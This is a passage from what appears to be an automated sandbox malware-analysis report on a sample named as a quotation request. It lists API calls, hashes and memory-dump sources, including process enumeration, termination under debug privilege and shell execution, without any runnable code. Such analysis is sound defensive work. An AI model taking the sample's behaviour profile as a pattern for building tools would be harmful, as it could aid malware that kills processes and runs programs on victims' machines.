                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                              • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                                                                                              • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                                                                              • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                                                                                              • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00464319
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00464336
                                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 0046435C
                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                              • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                                                                                              • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                                                                                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                                                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1211466189-0
                                                                                                                                                                                                                              • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                                                                                              • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                                                                              • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                                                                                              • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0046717E
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0046719B
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 256516436-0
                                                                                                                                                                                                                              • Opcode ID: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                                                                                                                                                                                                                              • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 004861F3
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                                                                              • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                                                                                              • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                                                                                              • _wcstok.LIBCMT ref: 0046EC94
                                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0046ED23
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0046ED56
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                                              • API String ID: 774024439-3081909835
                                                                                                                                                                                                                              • Opcode ID: 6e37ed649af5d512afd2ce7d6114d3d9866b74ed05b4e6f6fa3861298a33b37a
                                                                                                                                                                                                                              • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e37ed649af5d512afd2ce7d6114d3d9866b74ed05b4e6f6fa3861298a33b37a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                                                                                              • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3dcc62959e7023caf34c17f82bcd4e29477d55920de403acc4945fb022b9076b
                                                                                                                                                                                                                              • Instruction ID: 46b4ac146fbb0665a2833e9d76511dd6af63fa3af31f170c7a92b4824a30796f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dcc62959e7023caf34c17f82bcd4e29477d55920de403acc4945fb022b9076b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4561C871204700AFC710EB25CC41EAFB7A9EF84718F40892EF545A72D2DB38AD05C75A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsWindow.USER32(00C54220), ref: 0048B3EB
                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00C54220), ref: 0048B3F7
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                                                                                                                                                              • SendMessageW.USER32(00C54220,000000B0,?,?), ref: 0048B512
                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00C54220,000000EC), ref: 0048B571
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4072528602-0
                                                                                                                                                                                                                              • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                                                                                              • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0047F448
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0047F511
                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
